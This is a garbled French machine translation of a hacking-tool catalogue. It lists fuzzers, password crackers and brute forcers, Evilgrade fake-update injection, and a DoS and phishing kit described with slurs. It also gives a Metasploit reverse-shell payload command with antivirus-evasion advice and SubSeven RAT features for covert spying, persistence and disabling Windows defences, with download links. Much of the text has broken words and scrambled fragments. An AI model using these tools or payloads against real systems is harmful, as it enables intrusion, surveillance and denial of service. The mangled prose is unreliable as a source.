. ramper DOM Répétez. Le fuzzer doit beaucoup de son efficacité pour la génération dynamique de très longue du rée de liquidation des séquences d'opérations DOM dans plusieurs documents. cross_fuzz http://lcamtuf. 4. mélange aléatoire et le contrôle de sortance récursivité sont utilisés p our assurer une bonne couverture. Crawl DOM hiérarchie du premier document. XHTML. inspecter des objets retournés. à un d une poignée de codé en dur "intéressant" valeurs).objets visitées et références recueillies sont étiqu tés en utilisant une propriété injecté pour éviter une récursion infinie. la collecte de références à des objets renc ontrés pour une réutilisation ultérieure. paramètres d'app el sont synthétisés en utilisant des références recueillies et «intéressant» valeurs. peut être utilisé pour l'analyse des logiciels commer ciaux. dirtyJOE http://dirty-joe.). recursing en eux. Simple documen HTML. la collecte des ordures bascule. tels que l'ingénierie inverse du protocole et l a génération d'empreintes digitales. 5. La version actuelle a encore . 6. Le projet vise BitBlaze pour concevoir et développer une plate-forme d'analyse pui ssant binaires et emploient la plate-forme afin de (1) d'analyser et de développer de nouveaux mécanismes de protection et de diagnostic et de COTS (2) analyser. ramper DOM Répétez. et la création de références nœud circulaire que l es mécanismes de stress-test de collecte des ordures. Si une méthode retourne un objet. 3. 7. Critique. les formats pris en charge éventuellement plugin-pourraient être ciblés la place. qui four nit des solutions saines et efficaces à des applications au-delà des logiciels de sécu rité et de défense codes malveillants. au hasard peaufiner rencontrées propriétés de l'objet en les plaçant à une l'une des références précédemment enregistrées (ou.com/2011/01/announcing-crossfuzz-potential-0-day .cx/cross_fuzz http://lcamtuf. comme i diqué ci-dessus. SVG et sont choisis au hasard comme des cibles par défaut .bien q tout autre. une liste noire se condaire est utilisée pour empêcher la navigation loin ou descendre dans la fenêtre pr incipale. ts ue à Ouvrez deux fenêtres avec des documents de tout type (DOM-activé). effectuer plus d'un pourcentage de références recueillies pour le prochain cycle de fuzzing.. cross_fuzz détaillée fuzzing algorithme: 1. ainsi que les binaires malveillants. Aléatoirement détruire premier document en utilisant l'un des plusieurs méthodes po ssibles. 2.travaillent au niveau binaire.Java ensemble Editor est un éditeur complexe et visionneuse pour les fi chiers binaires Java compilés (fichiers de classe. Effectuer le même ensemble de ramper et opérations tweak pour le deuxième document. avec une certaine probabilité. Aléatoirement détruire les fenêtres de document.com/ dirtyJOE .coredump. Le projet s'effor ce également BitBlaze d'ouvrir de nouveaux domaines de l'analyse binaire. au hasard d'appel rencontrées méthodes de l'objet. mais les références utiliser les données collectées à partir du premier document pour écras er les propriétés et les méthodes d'appel dans le second. co mprendre et développer des défenses contre les codes malveillants. sa sortie est ensuite analysé et mo difié d'une manière similaire.blogspot.

AIX . les appels d'API. modifier les do nnées et ailleurs tester la sécurité des applications Java sur votre bureau. détection DLL code appelé et anti-VMWare.com/p/malwareanalyzer/ Il peut être utile pour l'analyse de chaîne de base de registre Windows. Il examine passivement la suite des échanges client-serveur à l'intérieur de votre réseau avec leurs leur couc he relative 7 tailles de charge utile et des intervalles de transmission. fl0p va vous prouver le contraire. mais seulement avec le résultat. Vous vous pouvez ajouter et améliore r la base de données avec vos entrées.aspectsecurity. * BSD. De la sortie que l'outil affiche. Michal Zalewski. HTTPS. MacOS X. etc son t complètement à l'abri de la surveillance. il est pris en charge sur de nombreux systèmes . fl0p http://lcamtuf. vous pouvez déchiffrer les adresses IP des deux hôtes participant à la communication.tgz Cet outil a été libéré le chemin du retour en l'an 2006 par M. dirtyJOE est gratuit pour un usage non-commercial. dirtyJOE est entièrement écrit en C + +. Principales caractéristiques: * Viewer pour: constant pool. aucune bibliothèque tierce partie étaient utili sés. Comment faut-il joindre à un pro cessus existant? Il installe stageloading "crochets" avec l'API Java Instrumenta tion et en travaillant avec certains bytecode.fp. bytecode. l'importation et l'exportation des . En cas de trafic HTTPS. C'est pourquoi ayant une bonne base de données est la base de données import ant. attributs * Sous la direction de:-tête du fichier constant pool. Vous pouvez continuer à regarder à la sortie et en apprendre davan tage sur le réseau. fl0p est un simple flux analyse passive L7 fingerprinter.quelques limitations.google. Ceci étant l aison. Le résul tat est ensuite jumelés avec une base de données de signatures modèle de trafic de dédui re de ses observations.com/p/javasnoop/ JavaSnoop est un outil qui vous permet d'intercepter les méthodes. Cela peut être une intéressante si vous avez beaucoup de temps pour planifier à l'avan ce votre attaque.google.Linux.coredump. méthodes. ou simplement regarder ce qui se passe sur le système.The peut être trouvé dans le fichier fl0p. Il affiche en-tête s détaillée des PE avec tous ses détails l'article. mais j'espère que ceux qui seront supprimés dans les prochaine s versions. javasnoop http://code. d'exécuter du code personnalisé. FTPS. Il le fai t. en vous permettant de l'attacher à un processus existant (comme un débogueur) et instantanément avec altération des appels de méthode. Mais.cx/fl0p-devel. Il est l a croyance populaire que les protocoles sécurisés tels que SSH. vous pouvez peut-être au ssi vérifier le site que le client a demandées. et Cygwin.p0f et a été codé en C.com/tools/javasnoop/ malwareanalyzer http://code. champs. Il le fait non pas en reniflant. les commandes IRC. Il a été lâchement basé sur un autre outil merveilleux . http://www.

StreamArmor rapide est livré avec scanner multi ADS fileté qui peut parcourir de façon récursive sur le système e ntier et découvrir rapidement tous les ruisseaux cachés. Il peut aussi générer des diverses sections d'un PE.com/p/pyretic/ antipyrétiques et le débogueur REpdb faciliter l'accès à l'obtention de source fermée appl ications Python source. Cela peut être utile si le pyc applictions sur disque sont brouillées dans l'une des nombreuses façons. tcpdump http://www. un accent particulier réside dans la manipulation une énorme quantité d'échantillons de logiciels malveillants et la mise en œuvre effective au CERT. la section de table. Présentation de blackhat ici: http://prezi. Il peut également effectuer une vérification de logiciels malveillants en ligne à www. StreamArmor a intégré dans le mécanisme de détection avancée de type de fichier qui examin e le contenu du fichier de détecter avec précision le type de fichier de flux.rootkitanalytics. DEP modification des paramètres.Sur la base de signatures PEiD.symboles etc Il peut également effectuer une vidange complète de l'ASCII PE avec d' autres options. StreamArmor est autonome. crochets de clavier. Il fournit également une fonctionnalité de traçage qui peuvent être utilisés pou r identifier les anti-debugging tricks appels.at. il peut également détecter les emballeurs utilisé pour compresser le fichier. articles. C'est l'analyse automatiq ue de pointe associée à un mécanisme de vérification en ligne menace en fait le meilleur outil disponible sur le marché pour éradiquer le mal d'eau.virustotal.org/ .php StreamArmor est l'outil sophistiqué pour la découverte cachée flux de données alternatif s (ADS) ainsi que de les nettoyer complètement le système. Il es t donc grand outil de l'analyse médico-légale dans la découverte de documents cachés / i mages / audio / vidéo / base de données des fichiers / archives dans le flux de donnée s alternatifs. application portable qui ne nécessite auc une installation. Répertoires de données. DOS Stub.google. Toutes ces découvertes flux s ont représentés en utilisant la couleur spécifique Patten fonction du niveau de menace qui le rend facile pour les yeux de l'homme de faire la distinction entre les s uspects et les cours d'eau normale.com/kmyvgiobsl1d/pyretic-rich-smith-bla ckhatdefcon-2010/ streamarmor http://www.com.html Construire une station automatisée d'analyse personnalisables logiciels malveillan ts en utilisant uniquement des composants disponibles gratuitement à l'exception d e la cible OS (Windows XP) elle-même. pyrétique http://code. En outre. sans avoir besoin de l'accès au bytecode directement sur le disque. appels de fichiers système de manip ulation.tcpdump. En un mot il vous permet de prendre un objet dans la mémoire au code source. PE-tête de fichier. comme l'en-tête D OS. Il peut être copié à n'importe quel endroit dans le système et exécuté dir ectement.at/downloads/software/minibis_en. e tc minibis http://cert. l'image d'en-tête en option. rootkit crochets. Comme l'objectif principal du lecteur de ce documen t devrait être en mesure de construire sa propre installation et de configuration spécifiques tout en étant libre dans sa décision les composants à utiliser.com/tools/streamarmor. etc analyseur Malware vous aidera également à l'analys e de code et de démonter les logiciels malveillants.

net/ Le Virtual USB Analyzer est un outil gratuit et open source permettant de visual iser les journaux des paquets USB. Il permet à l'utilisateur d'intercepter et afficher TCP / IP et les autres paquets sont transmises ou reçues sur un réseau auquel l'ordinateur est conn ecté. Avec une dizaine de lignes de code Python en couple. arrêt.php?post/2011/04/06/Sniffing-U . Son pilote en mode noyau a des capacités uniques qui lui permet de résilier. Le Virtual USB Analyzer n'est pas en soi un outil sniffeur USB.. Nous avons développé VUSB-analyseur chez VMware comme un moyen efficace pour déboguer notre virtualisation propre pile USB.sourceforge. # Une liste complète des services et un contrôle total sur leur (marche. annonce fil et piles avec les symboles dbghelp.. Un simple arborescence personnalisable avec mise en surbrillance de vous montrer les processus s'exécutant sur votre ordinateur. les processus. Nous allons décrire ici comment activer cette fonction. . c'est le premier outil au monde pour fourni r une visualisation graphique avec des dumps hexa premières et d'analyse de protoc ole de haut niveau. mais il est conçu pour être facilement extensible.sogeti. adapté pour une utilisation avec wireshark.Nous voulions un outil qui a fait. Il est juste une interface utilisateur permettant de visualiser les journaux. les variables d'environnement. Nous sommes ravis d'avoir mai ntenant l'occasion de la libération de cet outil en tant que logiciel open source. VMWare offre la possibilité de jeter tout le trafic usb au plus bas niveau à un fich ier de vidage. vous pouvez ajouter le sup port pour votre format de journal favori. informations sur les fichiers du module et cartographiés. # Une liste des connexions réseau.sourceforge. reprendre et supprimer). AVG Anti-Virus.tcpdump est un outil informatique commun de débogage réseau qui s'exécute sous la lign e de commande. # Contrôle total sur tous les processus. etc (pour n'en nommer que quelques-uns). En conséquence. la carte mémoire virtuelle. Attaquer Applications Process Hacker http://processhacker. même protégés par des rootkits o u des logiciels de sécurité. # Des informations complètes pour tous les processus: l'histoire complète la perform ance des processus. http://esec-lab. sous licence MIT. de suspendre et de reprendre tous les processus et les threads . VUSB-analyseur http://vusb-analyzer. Process Hacker détecte les processu . # Graphiques de performances détaillés. Com odo Internet Security. pause. y compris les logiciels comme IceSword. et nous voulions un moyen de résoudre les d eux exactitude des bugs de performance. Pour autant que nous savons. poignées. # Trouver les processus cachés et de les dénoncer. et en outre publier un script pour convertir le fichier dump au format PCAP. avast! anti-virus.com/dotclear/index. nous nous sommes retrouvés a vec ce que nous pensons est un outil assez unique. il est f acile de voir les problèmes à un coup d'œil.net/ Process Hacker est un élément-emballés outil pour manipuler les procédés et services sur v otre ordinateur.. à partir d'outils matériels ou logiciels renifleu rs USB. Il supporte actuel lement trois formats de journaux. les informat ions du jeton..

port source (en option).1.py. 8080.google.simplement un clic droit et sélectionnez u n processus "Injecter DLL" afin d'injecter et un clic droit sur un module et sélec tionnez "Décharger" pour décharger! # Beaucoup d'autres fonctionnalités . Sniff-n-Snip est un utilitaire très utile dans de tels scénarios.0. l'outil a besoin de cette bibliothèque pour l'analyse des paquets. Ce ci est désactivée par défaut.org/tools.un pour le téléchargement de fichiers à partir de cibles découvert et l'autre pour découvrir les objectifs. Sniff-n-Spit http://www.0. Ainsi. on peut voir que les épaisses clients parfois commu niquer avec un serveur dont l'adresse IP est codé en dur pour it. Ce que vous pouvez faire est de laisser ISR-Evilgrade sais que quelqu'un est dem andé pour une mise à jour.infobyte. Ce numéro peut être trouvé en utilisant le "-l".html Il est une structure modulaire qui nous permettent de tirer parti des implémentati ons de mise à niveau pauvres en injectant des mises à jour de faux. les valeurs seront 1 27. Les noms de ces scripts Python deux sont .s cachés par les rootkits simples telles que le Hacker Defender et FU.thief. Des entrées d'utilisateur: L'outil prévoit l'entrée d'utilisateur suivants: * Nombre de l'interface d'écoute. IP de destination. # Easy DLL injection et de déchargement ..The communication HTTP entre le client et le serveur est par exemple difficile d'intercepter et d 'essai. vous pouvez considérer c e assez complet. WebScarab.ar/developments. Il renifle les paquets HTTP du client vers le serveur et les transmet à votre proxy préférée (Burp . pa rce que TFTP. * Source IP. et Destination Port de la session TCP qui est à dédaigner * IP cible et la cible Port du proxy Interceptor.html Au cours de tests d'intrusion. L'o util d'origine va télécharger une mise à jour que si elle a été téléchargé depuis le site pri . evilgrade rapport de recherche internationale http://www.py et finder. Le vol TFTP http://code..cherche des serveurs TFTP sur une plage d'adresses IP de la cible TFTPTheft est une collection de deux scripts . Exigences: * WinPcap doit être installé sur le système. et c'est tout. * L'outil peut être forcé à écouter sur le mode promiscuous "dans le"-p "commutateur. etc Paros).des téléchargements de fichiers basé sur un modèle ou une liste de fichiers finder.com.com/p/tftptheft/ Le vol TFTP est un outil qui permet de numériser rapidement / bruteforce un serveu r tftp pour les fichiers et les télécharger instantanément. thief.py . Il peut le faire.andlabs.p as d'authentification.py . Généralement.C'est un outil qui permet de numériser rapidement / bruteforce un serveur TFTP pour les fichiers et les télécharger instantanément. le protocole Trivial FTP souffre encore d'un inconvénient majeur . Le reste sera fait par l'outil lui-même.

0.60001.com) * Google Analytics Javascript injection Speedbit * Optimizer 3.2.0.1 (Build 55) * 2.409 * AllMyNotes 1.0.14 * Mise à jour Windows (IE6 lastversion.4.1.13.04 LTS) ÜberTwitter * 4.6 (0.L'accès des DNS .2 Teamviewer * 5.26 * Notepad + + 5.0.25.1.2.3 Winscp * 4. <= 7.971) Facebook Blackberry * 1.0.0.98.5015 * ATube Catcher 1.5.2.10 (cadre Sparkle) * VMware les vecteurs d'attaque: -------------Interne décor: .9402 * VirtualBox (3. IE7 7.5 * Ccleaner 30/02/1130 * FCleaner 1. Gom * 2.9385 ISOpen * 4.0.5.1.45 Cpan * 1.116 (Safari 5.8.0.26 Adium * 1.3.1.581 * * TechTracker (CNET) 1.0 accélération vidéo / 2.22.1034 * Apt (<Ubuntu 10. 8 Quicktime 1675) * Mirc 7.5.0_22 winxp/win7 aMSN 0. Micr osoft Works) Dap * 9.1 * Clamwin 0.53.3.9 Script AutoIt * 3.8 Winamp 5.3 * * <= Appleupdate 2.2 * Java 1.5730.18.0. <Itunes = 10. ie8 8.0.2.8) * Discussion Express * Filezilla * Flashget * Miranda * Orbit * Photoscape.7.18702.0 * Istat.1.pal au lieu de votre serveur de mise à jour interne! A partir de maintenant.6.30 * * Jet photo 4.9.2.6.ARP spoofing .0.0.011 BSplayer * 2.22 | Twitter 1.3.300 Vidbox * 7. AntiRootkit Panda * * Skype * Sunbelt * SUPERAntiSpyware * <Trillian = 5.6.2 7533. rappo rt de recherche internationale-Evilgrade prend en charge les modules suivants: FreeRIP 3.96.11 (Iphone / Itunes) * GetJar (facebook.1.1 * Installer AppTapp 3.8es Nokiasoftware mise à jour du firmware (logiciel Windows) * Nokia firmware v20.7.

net/projects/worawita/ Bruter est un réseau parallèle connexion brute forcer sur Win32.google. le MIT et Heimdal Kerberos implémentations.net/jmk/medusa/medusa. De vérification des pouvoirs Bruter http://sourceforge. Spi derpig lit prototype méthodes à partir d'un fichier d'entrée et crée un fichier pdf..com/p/spiderpig-pdffuzzer/ Adobe et d'autres utilisations javascript dans les fichiers PDF à améliorer le workf low standard.it/cain. modulaire. force brut e et les attaques cryptanalyse.I na pas trouve r un fuzzer qui Fuzz imeplementaiton javascript Adobe. Cet outil est desti né à démontrer l'importance de choisir des mots de passe forts.L'outil fonctionne à la fois contre Microsoft Active Directory. Medusa vérificateur parallèle connexion réseau http://www. Nous avons donc ici un fu zzer Spiderpig javascript pour format de fichier pdf qui tente devisser pour lir e les pdf en utilisant des méthodes javascript. par exemple la connexion à la base de données.net/wp/krbguess/ KrbGuess est un petit outil simple et qui peut être utilisée durant les essais de sécu rité de deviner les noms d'utilisateur valides à l'encontre d'un environnement Kerbe ros. le décodage des mots de passe brouillés. massivement parallèle. En outre. L'auteur considère les points suivants comme certains de s principales caractéristiques de cette application: . la vérification orthograp hique. récupérer les clés de réseau sans fil.L'accès des DNS .foofus. etc. révélant boîtes mot de p e. impression n visualisation. essais par force brute peut être effectuée sur plusieu . Cain & Abel http://www. L'objectif est de soutenir autant de services qui permettent l'authentifi cation à distance possible. craquage de mots de passe crypté à l'aide du dictionnaire. il exécute ce code javascript (tu nous savons tous que). enregistrement des conversations VoIP. Le but de Bruter est d e soutenir une variété de services qui permettent l'authentification à distance. Lorsque nous ouvrons pdf dans le lecteur .cqure.Essais de fil à base parallèle. découvrir des mots de passe en cache de routage et d'analyse protocole. si l'objectif de Spider pig est de trouver des bogues dans le moteur javascript pour lire les pdf's. connexion brute f orcer. La plupart des fuzzers pdf qui sont disponibles sur Internet sont fuzzers format de fichier qui tente de fuzz format d'Adobe fichier implementation.DHCP spoofing Externe décor: .html Medusa est destiné à être un rapide.DNS Cache Poisoning . il permet de détecter si un compte n'a pas de pré-authentification.oxid. KrbGuess http://www. Il permet une récupération aisée des différents types de mots de passe en sni ffant le réseau. Il vous permet de faire cela en étudiant la réponse à une demande TGT pour le ser veur KDC.DNS Cache Poisoning Spiderpig http://code.html Cain & Abel est un outil de récupération de mot de passe pour systèmes d'exploitation Microsoft.

Spécification de l'option à deux r eprises comme "-f-f» fera Ncrack tcomplètement quitter après tout titre se trouve sur tout service. Cela signifie qu'aucune modification n'est nécessaire à l'application de base afin d'étendre la liste des services pris en charge pour brute force.php RSYaba est un outil pour exécuter des attaques par force brute contre divers servi ces d'une manière similaire à Hydra et Méduse. ce qui oblige à quitter Ncrack craquage d'un servic e après qu'il trouve un titre de compétence pour cela. caractéristiques Ncrack comprennent une interface très souple octroi de l'utilisateu r le plein contrôle du fonctionnement du réseau. Ncrack va maintenant t ester une entrée vide chaque fois qu'il voit une ligne vide dans l'une des listes de mots. Le même comportement s'applique pour le passage des options utilisateur »ou« de passage ». . * Ncrack pouvez maintenant casser le Remote Desktop Protocol sur toutes les vers ions de Windows XP à partir et au-dessus. RSYaba http://www. En outre. Elle permet de rapides. Télécharger RSYaba L'outil est écrit en Ruby afin de modifier les scripts est beaucoup plus simple qu e d'avoir à changer C / C + + puis recompiler le code. utilisateurs ou mots de passe en même temps. Indépen dante. de la vérification à gran de échelle et fiable de plusieurs hôtes. chaque élément peut être so e entrée unique ou d'un fichier contenant des entrées multiples. car ils ne peuvent pas gérer plusieurs connexions simultanées RDP. * Mise en œuvre du module SMB qui peut se fissurer Microsoft SMB / CIFS services a insi que UNIX serveurs Samba. Chaque module de service existe un fichier mod. Alors qu'il est déjà utile à certaines fins. des logiciels de qualité alpha. * Amélioration de la scorpion Ncrack logwith une version mise à jour SVG. * Ajout du support pour les essais à blanc le mot de passe.randomstorm.org/nmapdev/2010/q3/450 pour le craquage des machines Windows XP. . Le s utilisateurs sont bien avisés de la bande de roulement http://seclists. l'interacti on d'exécution similaire à Nmap et bien plus. permettant de très sophistiqué attaques bruteforcing.La conception modulaire.com/rsyaba-security-tool.pr ofessionnels de la sécurité comptent également sur Ncrack lors de la vérification de leu rs clients. * Lancement de la '-f' option.L'entrée d'utilisateur flexible. un format de fichier combinaison permet à l'utilisateur d'affiner leur liste cible. informations cible (hôte / utilisateur / mot de p asse) peut être spécifié dans une variété de façons. Tous les modules de mesure sont basées sur les pierres précieuses Ruby standard. une syntaxe de ligne de c ommande similaire à Nmap et un moteur dynamique qui peut adapter son comportement en fonction des informations réseau. Ncrack a été conçu selon une approche modulaire. Il a été construit pour aider les entreprises à sécuriser leurs réseaux de manière proactive tou s les tests de leurs hôtes et les périphériques réseau pour les mots de passe faibles.org/ncrack/ Ncrack est une authentification de réseau haute vitesse de fissuration outil. de sorte qu'ils traitent tous . Ncrack http://nmap. le calendrier des modèles pour la facilité d'utilisation.rs hôtes. il est encore inachevée.L'outil a été rédigé après de mauvaises expérie obtenir les outils existants de fonctionner correctement avec le protocole HTTP et SSH il a été décidé de faire un outil qui serait plus facile à configurer. avec l'introduction du module de RDP. Ncrack a démarré comme un «Google Summer of Code" du projet en 2009. Par exemple.

com/research. MySQL et SSH et de nouveaux modules s eront ajoutés et mis à jour cette page en conséquence. 7 et 2008 (Vista n'a pas été fait encore testé.: LM / NT hash).un rar incorporé dans un jpg. les formes qui utilisent des jet ons unique afin d'éviter les attaques par force brute. Liste d'outils (mise à jour v3) * Windows (et du vin pour les pédés Linux et Mac) o BWraep o BWRaeper. profiter de cette". 2003.NET Leecher o Proxy Forum o LOIC o Longcat Flooder (distribué et autonome) Flood Ping o o rok / i / ts o SMAC o Sinflood wgetraep o o Certains app gay à unlimit connectiosn ip Serveur SMTP o o Tous les nouveaux équipements DoS * Linux / Unix / Mac pygetraep o * Basée sur le Web . Il s'agit d'un ensemble d' outils. supprimer la liste et l es informations d'identification associées (ex.les trucs protocole qui veut dire qu'il ya un bon niveau d'abstraction pour le c adre d'attaque réelle. Pendant la rédaction du module HTTP. dont beaucoup déjà ici. ma is il devrait fonctionner) THC-Hydra http://freeworld. mais il ya des nouveaux outils qui ne sont pas n'imp orte où ailleurs sur le w / i / ki. Vista. pour effectuer la transmission de la table de hachage sur Windows et également obtenir NT / LM hash à partir de la mémoire (les ouvertures de session i nteractive.org/thc-hydra/ Un biscuit salé du réseau très rapide d'ouverture de session qui supporter de nombreux services Dark Alley Dangereuses Kitten http://partyvan. par exemple. Compatible Windows XP. avec la photo d'un chaton dans une main. la capacité de gérer l'authentification qui repo se sur un cookie déjà fixés et. L'outil prend actuellement en charge HTTP. et le sous-titre "Il est dangereux d'y aller seul. Ceci peut être utili sé.info/wiki/Dangerous_Kitten "Dangerous Kitten" tire son nom de la façon dont il a été initialement répartis . une fonctionnalité a été ajoutée qui fait défaut dans t ous les bruteforcers HTTP d'autres. Sous la direction de Windows de vérification des pouvoirs http://www. modifier. connexions Bureau à distance.ampliasecurity.html Sous la direction de Windows de vérification des pouvoirs (WCE) permet de lister l es sessions d'ouverture de session et ajouter. services.thc. etc) qui peuvent être utilisés à d'a utres attaques. encore plus strictes.

y compris la preuve des concepts partie d'un grand nombre de «sécurité» des livres.. encore beaucoup.o Les liens de téléchargement de serveurs web: WAMP (Windows) XAMPP (Windows / Linux / Mac / Solaris) et MAMP (Mac) AnonProxy o * Flooder o Formulaire FormFlood * o floodeur Mail o Miniloader o Myspace phisher o Vampire Raep script Imagerie Raid o + Hueg3. copiez votre shellcode et de l'exécuter. J'ai été surfer sur le net et j'ai trouvé quelques tutoriaux intéressants et .http://goo. elle est limitée à POSIX. Au moment de la rédaction de ce texte.gl/HTw7o. que dès que il atterrit sur le système cible AV-protégée est reconnue comme dangereuse et potentiellement bloqués (selon l'analyse à l'accès des paramètres) par de nombreux produits anti-virus.168. shellcodeexec https: / / github. moins logiciels AV le détecte pas.exe-t exe Cela génère une charge utile stager Metasploit. Cependant. des informations sur la façon d'allouer une page mémoire lecture / écriture / exécutable sur les systèmes POSIX. il résout un problème réel monde commun: le système cible anti logiciel de blocage de virus un stager charge Metasploit-générés (soit EXE de ELF). Contexte = = La plupart des lanceurs shellcode là-bas.com + Goatse * Moar nouvelle merde o / i / + Kit Hackerpackage inclus o Mises à jour générales et beaucoup de merde ajouté. = Brève description = shellcodeexec est un petit script à exécuter en mémoire une séquence d'opcodes. 21 41 anti virus le détecte comme malveillant . payload.exe. En outre.1 LHOST R | msfencode-a-e x86 x86/shikata_ga_nai-o / tmp / paylo ad. En encodant plusieurs fois avec msfencode. Les champs marqués d'une * sont nouveaux ou mis à jour dans la version la plus récente .jpg + Filigranes EbaumsWorld..com / inquisb / shellcodeexec http://bernardodamele.136. ne considère pas nécessairement l'architecture 64-bits et les systèmes Windows. Prenez par exemple la ligne de commande suivante: fenêtres msfpayload $ / Meterpreter / reverse_tcp EXITFUNC processus = LPORT = 444 4 = 192.com/2011/04/execute-metasploit-payloads-b . Cela fonctionne très bien. puis exécutez votre shellc ode dans différentes architectures et systèmes d'exploitation.blogspot. = Description = Ce script et les fichiers de projet pertinent (Makefile et Visual Studio fichiers) vous permettent de compiler l'outil une fois.

* Génère un nouveau thread où le shellcode est exécuté dans une structure gestionnaire d'exception (SEH) de sorte que si vous envelopper shellcodeexec dan s vos propres exécutable. * Pour autant que je sache. Donc la question est. facile à utiliser l'outil d'administration à distance (R AT) conçu pour fonctionner sur toutes les plates-formes Windows actuelles. comment serait-il cool d'avoir une solution définitive à éviter tous ces tracas? C'est exactement là où cet outil entre en jeu! Caractéristiques = = shellcodeexec: * Peut être compilé et fonctionne sur POSIX (Linux / Unix) et les systèmes Windows.subseven. Aperçu des caractéristiques SubSeven. s'il vous plaît ne pas utilis er l'outil. * Fonctionne dans DEP / NX-environnements permis: il alloue la page de mémoire où il stocke les shellcode que + rwx . * Peut être compilé et fonctionne sur 32-bit et 64-bit architectures.php SubSeven 2. à la fois 32 bits et 64 bits.3 est un simple.guides sur les emballages. S'il vous plaît utiliser cet outil de façon responsable et lu et j'accepte l'avertissement avant de l'util iser.org/home.exe (911KB) Client: . Cet outil est destiné aux personnes qui veulent que le pouvoi r peu plus et le contrôle de gestion informatique à distance. il évite l'ensemble du processus de collision en cas d'imprévus comportements. Vous acceptez la responsabilité pleine et entière responsabilité de vos ac tions lors de l'utilisation SubSeven.Réglez le variable BufferRegister au registre EAX où l'adresse en mémoire de le shellcode sera conservée.Transfert Vue (upload / download de détails <-> de l'hôte) . mais ne s'arrête pas quelques durs à mourir virus anti de détecter votre porte dérobée. obscurcir et l'application de l'IDA-f oo exécutables portables et similaires en vue de réduire le nombre d'AV produits qui peuvent le détecter comme un fichier malveillant. * Il supporte des charges utiles alphanumériques codés: vous pouvez diriger votre co dage binaire shellcode (générés par exemple avec msfpayload Metasploit a) à msfencode Metasploit pour l'encoder avec l'encodeur alpha_mixed. SubSeven http://www. aucun AV détecter comme malveillants.Si vous n'êtes pas d'accord avec l'avertissement. Cela est d'autant i ntéressante.Fenêtre d'affichage (Voir active sur Windows SubSeven) Managers: . Ne pas utiliser cet outil sur les ordinate urs que vous n'êtes pas autorisé à contrôler. la compression.inscriptibles lisibles et exécutables. afin d'éviter get_pc () stub binaire à ajouté au début du shellcode.

Répertoire d'installation (vous permet si vous souhaitez que le serveur doit être installé) .Process Manager (vue active / tuer les processus actifs de niveau dll) .Installé Apps (liste des applications installées) .Fun Manager (farces général de bureau) Espionnage: .Groupe de raccourci (vous permet d'ajouter vos services préférés en tant que raccour cis .Mot de passe (récupérer perdu / mots de passe oubliés pour les différents navigateurs.IP statique Notification client (NAS client) (un outil d'écoute qui permet à vos hôt es à distance pour vous avertir quand ils sont en ligne) .Les extensions serveur (vous permet de vérifier que l'extension que vous souhait ez le serveur à utiliser) .Attendre le redémarrage (attend à exécuter lors de la réinitialisation suivante) .2.Lire (vous permet de parcourir et lire les paramètres du serveur) .Options du serveur (arrêt / marche / supprimer du serveur sur l'hôte distant) Construit dans les outils: . de stockage.Indication et exécute Active barre d'état (vous donne des informations utiles) EditServer.4 ko Réseau: ..Exécuter visibles (permet à l'ordinateur hôte à savoir le serveur est en cours d'exécuti on) Nom du serveur (ce qu'il dit) - .Serveur de protection (mot de passe vous permet de protéger le serveur) .TCP Tunnel (relais ports hôte distant à l'ordinateur local) .Gestionnaire des services (services de rafraîchissement / installer des services / supprimer des services / gestion de l'hôte distant) .exe (254KB) L'état du serveur: .Registry Manager (modifier / ajouter / supprimer des entrées de registre sur l'hôt e) .Ordinateur de bureau (et cliquez sur le bureau de l'hôte distant) .Réseau navigateur (la liste des partages sur l'hôte distant.Faire fondre le serveur (le serveur permet à disparaître une fois exécuté) .Webcam (Voir la webcam sur l'hôte distant) .Remote Shell (afficher l'invite de commandes sur l'hôte distant comme s'il était l ocal) .Audio (capture micro / ligne-dans l'entrée ne l'hôte distant) GIF .Gestionnaire de fichiers (upload / download / run / supprimer / lire des fichi ers sur l'hôte) .Circulation Viewer (listes connexions réseau actives sur l'hôte distant) . les clients de messagerie et messagerie instantanée) .NO-IP compte / IP outil de mise à jour automatique (vous permet d'entrer vos inf ormations de compte NO-IP de mise à jour automatique le site Web des changements d e propriété intellectuelle) . permet de cartographi er) Système: .

firecat.Désactiver l'UAC (désactive l'UAC lors de la réinitialisation suivante) Exe: .0. Autohack vos cibles avec une interaction moins possible. Il peut également être utilisé po ur tester IDS.Désactiver le Pare-feu (désactive le pare-feu offre UAC est désactivé) .Explorer (installe sur l'exécution de Shell de l'explorateur) .Politiques (exécute sur Windows politiques de démarrage) .Sélectionnez un fichier à se lier au serveur. générer le script et de le transférer à votre php / cgi d'accueil) Fichiers Bind: . IPS et d'autres capteurs de surveillance / logiciels.Nom de la clé (keyname pour les entrées de registre Par exemple Remote Server Host .ActiveX (installe dans l'ActiveX chemin de clé) . Le fichier binded exécutera avec le se rveur .com.com/users/quakerdoomer/v2/w/ winAUTOPWN est un auto (hacking) shell gagner outil.5KB) . Caractéristiques: .C'est votre serveur configuré pour déployer sur l'hôte distant.) . Télécharger>> http://www.Désactiver Win défenseur (désactive Windows Defender) .3. vous pouvez exécuter tinyvnc pour la gestion plein écran) Pare-feu Windows: .Registre Run (exécuter installe sous clé de registre) . ou pour des essais locaux 127.. par exemple http://www.) Notifications: .Registre RunServices (s'installe sous clé de Registre RunServices) .CGI / PHP (préciser votre adresse de site Web.1) .0.Registre RunOnce (installe sous clé runonce registre) .rar winAUTOPWN http://blacklistedhosting.) Server.dll Load / exe (charger un exe ou dll pour extraire les icônes et les utiliser sur votre serveur.NAS (préciser votre réseau local adresse IP externe ici.host.par exemple.Winlogon (le même que ci-dessus pour winlogon) .exe (58.Faux messages: Activer (actifs de l'option faux message) Message icône (vous permet de choisir votre image pour le message) Boutons disponibles (sélectionnez les options de l'ordinateur hôte doit presse) Titre du message (le texte le titre du message) Message texte (le texte du corps du message) Test (vous permet de tester le message sur votre PC) méthodes de démarrage: .Navigateur (naviguer vers ico.fr/---sys/SubSeven_2.

